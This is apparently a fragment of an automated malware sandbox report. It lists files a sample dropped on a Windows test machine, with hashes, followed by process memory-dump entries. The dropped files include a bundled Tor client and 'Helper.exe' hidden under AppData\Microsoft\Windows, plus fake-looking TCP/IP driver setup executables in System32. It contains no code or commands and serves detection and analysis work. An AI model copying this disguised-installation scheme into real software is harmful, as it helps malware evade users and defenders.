7d1ea58fc798e841e4bc754c83d0e970

SHA1
ddec54a3ee90db2d1d0100f2cc57ef764cc91c0d

SHA256
624fe20c5bb672536ab47de5a6a20dbedf44dd063a45f45734bfc280630613fd

SHA512
7eb488188de274b3bc3df9f2ac95199df4427d665b4bd67ca57d4e5a99b02a32646cfdbc27c27418e4f6cfaf4c10623298f2e5863499b9dbddbc4d76ebf6bbf2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll

Filesize
974KB

MD5
be51ba4bea2d731dacf974c43941e457

SHA1
51fc479fd8ee9a2b72e6aa020ce5bb1c7a28f621

SHA256
98d06628e3d9c8097d239722e83ad78eb0b41b1e2f54d50a500da6d9292ff747

SHA512
6184accd206aa466278c2f4b514fd5c85820d47cf3a148904e93927621ac386890e657f09547b694c32ef23c355ae738b7c7d039fcd6c791529198c7b0b6bd1e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_core-2-1-7.dll

Filesize
328KB

MD5
b908e67f04fcd4f2e1e0c4a5f2115b10

SHA1
7e3d1196f0e101cc98074c7a40cbe83099780c95

SHA256
4efacc7980de2db4d08f8a237ddff10aae35aebc11ecbd52ed6cfae944415e9e

SHA512
838b0a4d8bfd3d56dfdb3286d0438469e74b24b6cc86830403373bc89a1420a10df66fe7587879515e8bca5f21b97aa4e1698d133571081e5eecae8b7db31bd3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_extra-2-1-7.dll

Filesize
657KB

MD5
7cb2f0f4bba8d16c3200e9ac2a25b7c0

SHA1
63cf39682bf6876f563e1567df3c55fd5939e6ea

SHA256
ec52e90c68dd0e7603df3f9fe6c909d019a7e94dc3ce0efd8baf67864a43b74b

SHA512
7a660d87739914c68cadb56a4acbf27d68fd145b3bb65b957b4c767dfabe0762c40d58faa3a2df3b3453083ea658411c79d53be5166dda844782a9cd2617a264

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
ead6d4a87041e13b9041f78be1cb84d1

SHA1
896a336e08a1904537ee5a4a86eb0e885a18e17a

SHA256
b94b8981f8110944c5b03c9cba4066e9d0daa13687dead387bcbc772132c6d24

SHA512
34054ec79691145a8d511f9425f9ad44e07f8bfb38bd0b3251a5db3358c0055344615990fb770d4bdcbf04c9461847dfd4f6d2bac1e43ec815426a94d065c580

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssl-1_1-x64.dll

Filesize
965KB

MD5
7847c7b13b3414e8e7652880b4609205

SHA1
930670acc16157f56aaf69423e5d7705441764ba

SHA256
38200438cf0c9c20d17e5b9030d2ad2e4a1b6b9dc41c287bc603dd50d22e67bb

SHA512
c3c81dc3eb546c40b3606338deadbd63331659645dd24b5fd0d4fb3170b053fef528ee3fe005c9446176a5c049e9412ea8193ad2f8b9a7301ff67b088f1bbb6e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll

Filesize
313KB

MD5
97d89dec5f6a236b6832a5f3f43ab625

SHA1
18f2696a3bf4d19cac3b677d58ff5e51bf54b9e8

SHA256
c6dca12e0e896df5f9b2db7a502a50d80d4fb014d7ec2f2ceb897b1a81f46ead

SHA512
7e82d1e37dc822a67e08bd1d624d5492f5813a33ec64f13d22caef9db35ebb9bb9913582289ebdecad00e6b6148d750ae0b4437364ef056d732734255498be54

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll

Filesize
608KB

MD5
624304f2ba253b33c265ff2738a10eb9

SHA1
5a337e49dd07f0b6f7fc6341755dc9a298e8b220

SHA256
27b857131977106c4a71ce626225d52a3d6e2932cb6243cb83e47b8d592d0d4f

SHA512
163820961a64b3fda33969cbb320aa743edc7a6bacebe033054c942e7a1d063f096290a59fad1569c607666429e2f3133fcfe31ef37649f9da71b453ef775e5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
4.3MB

MD5
9f2d86da7d58a70b0003307d9cfc2438

SHA1
bd69ad6ea837e309232d7c4fd0e87e22c3266ac5

SHA256
7052619814a614a1b157c5c94a92dbec22b425a0977ac8b21958b8db81e2dd65

SHA512
ce345ff77d8043f416a04b782be8e7b0d5fdea933f3ac79abb88648a9fca23d7a69f537a825d0b636ba64f80afe70f758114ddbf412bd9398800ba4b6e359a99

Download Submit
C:\Windows\System32\SetupTCPIP6Driver.exe

Filesize
8KB

MD5
488bfa6d9fd5c874585daa3f960e6804

SHA1
aa8ca3927c318716e14210fc0a3ed70ea483eb23

SHA256
a84bfef2ce112366349e3ce8c70e120ec63731535696b405a458e5ccfcdf7f48

SHA512
952db3ec6548421b8c013c1482545e005c7526f0c4f432b12bde8460a13c88d0f1022cfe3008af88bb043d9fdede9e341bcc406d7d2fc8370249da75642a07a1

Download Submit
C:\Windows\System32\SetupTcpipDriver.exe

Filesize
28KB

MD5
2fbe46325e890bee1e21aba30c9345be

SHA1
2c860d226f6b8f59caa058e39d06d6ae24007227

SHA256
cfbd108945d203a6a5ced2dc4eee0084ba66972c1361c05b6b7065276f15eb4b

SHA512
133e2c1a9bad1b7a9c7e519c6132a4494af5a0233c47ee3eecae263f72bce8345356f032bbbcdefc934776020b210327f18a52b72138006808975f8bad2ebc34

Download Submit
\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt

Filesize
50KB

MD5
66651cc54266f561f200a108404aaabb

SHA1
1147b957f9604bf8639518a971eabac7b4b80c1f

SHA256
19099c81245816e4ecc0e86534b9c5abc1064850c96d87cd4ea06c618c819c8c

SHA512
560995924b7aebfdf5d2fe59616dccfcc3076bb970a3676bbd2af59a5c422b3155193acf47a738017b62224422b146fdf7e4a7a19c18ca6a6afae6cf1e0b0750

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
885KB

MD5
cca0838e8313769dc8a15e042415a3b1

SHA1
2f7f679880b517ebfbeda3aeae0bc5a8ae32f881

SHA256
2f869cbc6884b35c82060f58ee128819d7663121d9d9eff20c4d0f7f747ae8c2

SHA512
db8fcb89b7cb8fa9cc6209a683849e966520c2b226092772af37f12d2676580ba3f62665cf7c4e6d306087608012ad6e704984ff988c379d32cb47757fd0ac22

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
2.4MB

MD5
8c792bf9c45966e22a09915edc6b5ab2

SHA1
e1acd9a3d4ff876cc36fdb9609011043c8307163

SHA256
980b112cc3f2b58d6eaf4f321689e08f847083cb7b9fbf4ead0bda83044fa477

SHA512
18a7ba7dac0abaf82cfb57027961d3b7391be33b223e67e9505456366f36f38fd0f0f50162885bc31787078c424e6f4a117eec498c91682dd41ae6664a5fa887

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
1024KB

MD5
155a5eeae8aa69ff384d75961b153754

SHA1
66e1fdb55348221e642b032621156bc1952d0da0

SHA256
05d4e758a5589cb67a2ffe869221acb19c96ed5e1dc70d1584e88d22cc7522fc

SHA512
3679bbc53a0c91ea400e72bf805c1be2db984e8e9fcda06938847393041eee7bd277572efc8e7f97166a9477526faeba016dda230b384ee2a5b0f3d346da0bd1

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1-x64.dll

Filesize
2.9MB

MD5
01acb8588f33a1a9da3663c7de1c5b40

SHA1
af93a428ed4dba6b77826d849858679f83a2a46d

SHA256
4d4e5f31605d54ad96785187af1873911e79452923ed9df9d567d8326c6b1ada

SHA512
1286bc5e7d6ff04375a093764264a260cdc61f61b5a232640fd8095769b1118c04ba319b215c975ec888b57a785be61faaffc1a49ea6fcc0f15e65128392a768

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
3.4MB

MD5
bbd7121f7af1adee9a456ea10a8a4aee

SHA1
5fdfe33e817ac253689de9e5377edc6a4fee6d5f

SHA256
e37a12253bda5f2c5fd159b646a0b11d1125427496f91b9ac30d53c6a8c18ab3

SHA512
836fa5177bdd3cd49ca732bde77a7a0b1387bdc7864a6ccb00b6ffea5c1cb48aa7e6195e495edfead2867d43f277d708748eed26ed2d8e1bff534ed46b8c15d8

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
3.2MB

MD5
239786c327fbe739d0ed36b10e90e961

SHA1
7f8ea1f9b6fb57286672b8f2270e8813b460515e

SHA256
a3efea53cc5c4adfe7d1fd79eca0b203ca3dfa74083fe652137590bf19eacb53

SHA512
b7edf561ea05efe2d945db102d4af1da66ba58f1c546e20582e1855ba10778d8c1a700977b51e2cedfe7138090f6abcdc413cba731de7eb30ad16cf721fb4460

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\zlib1.dll

Filesize
107KB

MD5
d490b6c224e332a706dd3cd210f32aa8

SHA1
1f0769e1fffddac3d14eb79f16508cb6cc272347

SHA256
da9185e45fdcbee17fcd9292979b20f32aa4c82bc2cb356b4c7278029e247557

SHA512
43ce8d4ee07d437aaca3f345af129ff5401f1f08b1292d1e320096ba41e2529f41ce9105e3901cb4ecb1e8fde12c9298819961b0e6896c69b62f5983df9b0da3

Download Submit
memory/664-767-0x0000000000460000-0x0000000000583000-memory.dmp

Filesize
1.1MB

Download
memory/664-774-0x0000000000460000-0x0000000000583000-memory.dmp

Filesize
1.1MB

Download
memory/664-770-0x0000000000460000-0x0000000000583000-memory.dmp

Filesize
1.1MB

Download
memory/664-768-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1512-83-0x000007FEED400000-0x000007FEEDD9D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-90-0x000007FEED400000-0x000007FEEDD9D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-81-0x000000001B3B0000-0x000000001B692000-memory.dmp

Filesize
2.9MB

Download
memory/1512-84-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/1512-82-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/1512-85-0x000007FEED400000-0x000007FEEDD9D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-86-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/1512-87-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/1512-88-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/1680-74-0x0000000000CB0000-0x0000000000CCC000-memory.dmp

Filesize
112KB

Download
memory/1680-75-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/1680-433-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/1680-204-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/1868-107-0x000007FEEDDA0000-0x000007FEEE73D000-memory.dmp

Filesize
9.6MB

Download
memory/1868-109-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1868-108-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1868-106-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1868-105-0x000007FEEDDA0000-0x000007FEEE73D000-memory.dmp

Filesize
9.6MB

Download
memory/1868-104-0x00000000022B0000-0x00000000022B8000-memory.dmp

Filesize
32KB

Download
memory/1868-103-0x000000001B220000-0x000000001B502000-memory.dmp

Filesize
2.9MB

Download
memory/1868-128-0x000007FEEDDA0000-0x000007FEEE73D000-memory.dmp

Filesize
9.6MB

Download
memory/1868-110-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/2212-145-0x0000000000070000-0x000000000007C000-memory.dmp

Filesize
48KB

Download
memory/2212-147-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/2212-763-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/2316-137-0x0000000000C30000-0x0000000000C3C000-memory.dmp

Filesize
48KB

Download
memory/2316-138-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/2316-148-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/2532-141-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/2532-59-0x000000001CE30000-0x000000001CEB0000-memory.dmp

Filesize
512KB

Download
memory/2532-0-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/2532-53-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

Filesize
9.9MB

Download
memory/2532-2-0x000000001CE30000-0x000000001CEB0000-memory.dmp

Filesize
512KB

Download
memory/2532-1-0x000000013FBE0000-0x0000000140B8E000-memory.dmp

Filesize
15.7MB

Download
memory/2576-14-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2576-9-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2576-15-0x000007FEEDDA0000-0x000007FEEE73D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-13-0x000007FEEDDA0000-0x000007FEEE73D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-10-0x0000000002400000-0x0000000002408000-memory.dmp

Filesize
32KB

Download
memory/2576-11-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2576-12-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2576-8-0x000007FEEDDA0000-0x000007FEEE73D000-memory.dmp

Filesize
9.6MB

Download
memory/2576-7-0x000000001B2A0000-0x000000001B582000-memory.dmp

Filesize
2.9MB

Download
memory/2680-207-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/2680-205-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/2680-209-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/2680-206-0x00000000006B0000-0x00000000006B1000-memory.dmp

Filesize
4KB

Download
memory/2780-40-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2792-54-0x000007FEEDDA0000-0x000007FEEE73D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-58-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2792-52-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download
memory/2792-60-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2792-51-0x000000001B2A0000-0x000000001B582000-memory.dmp

Filesize
2.9MB

Download
memory/2792-56-0x000007FEEDDA0000-0x000007FEEE73D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-61-0x000007FEEDDA0000-0x000007FEEE73D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-55-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2792-57-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2804-34-0x000007FEED400000-0x000007FEEDD9D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-33-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2804-35-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2804-31-0x00000000025A0000-0x00000000025A8000-memory.dmp

Filesize
32KB

Download
memory/2804-36-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2804-32-0x000007FEED400000-0x000007FEEDD9D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-30-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download
memory/2804-37-0x000007FEED400000-0x000007FEEDD9D000-memory.dmp

Filesize
9.6MB

Download
memory/2816-833-0x0000000075260000-0x0000000075283000-memory.dmp

Filesize
140KB

Download
memory/2816-829-0x0000000074D70000-0x0000000074DC4000-memory.dmp

Filesize
336KB

Download
memory/2816-1340-0x0000000001170000-0x00000000015D1000-memory.dmp

Filesize
4.4MB

Download
memory/2816-4261-0x0000000001170000-0x00000000015D1000-memory.dmp

Filesize
4.4MB

Download
memory/2816-846-0x0000000001170000-0x00000000015D1000-memory.dmp

Filesize
4.4MB

Download
memory/2816-827-0x0000000001170000-0x00000000015D1000-memory.dmp

Filesize
4.4MB

Download
memory/2816-2721-0x0000000001170000-0x00000000015D1000-memory.dmp

Filesize
4.4MB

Download
memory/2816-832-0x0000000073510000-0x00000000735E3000-memory.dmp

Filesize
844KB

Download
memory/2816-828-0x0000000073A90000-0x0000000073B73000-memory.dmp

Filesize
908KB

Download
memory/2816-831-0x0000000071480000-0x000000007176D000-memory.dmp

Filesize
2.9MB

Download
memory/2816-4298-0x0000000001170000-0x00000000015D1000-memory.dmp

Filesize
4.4MB

Download
memory/2816-830-0x00000000742A0000-0x0000000074338000-memory.dmp

Filesize
608KB

Download
memory/4260-4290-0x0000000000530000-0x0000000000653000-memory.dmp

Filesize
1.1MB

Download
memory/4260-4286-0x0000000000530000-0x0000000000653000-memory.dmp

Filesize
1.1MB

Download
memory/4260-4284-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmp

Filesize
4KB

Download
memory/4964-4311-0x00000000000E0000-0x0000000000BF1000-memory.dmp

Filesize
11.1MB

Download
memory/4964-4312-0x000007FFFFFD3000-0x000007FFFFFD4000-memory.dmp

Filesize
4KB

Download
memory/4964-4314-0x00000000000E0000-0x0000000000BF1000-memory.dmp

Filesize
11.1MB

Download
memory/4964-4317-0x00000000000E0000-0x0000000000BF1000-memory.dmp

Filesize
11.1MB

Download
memory/4964-4319-0x0000000001020000-0x0000000001040000-memory.dmp

Filesize
128KB

Download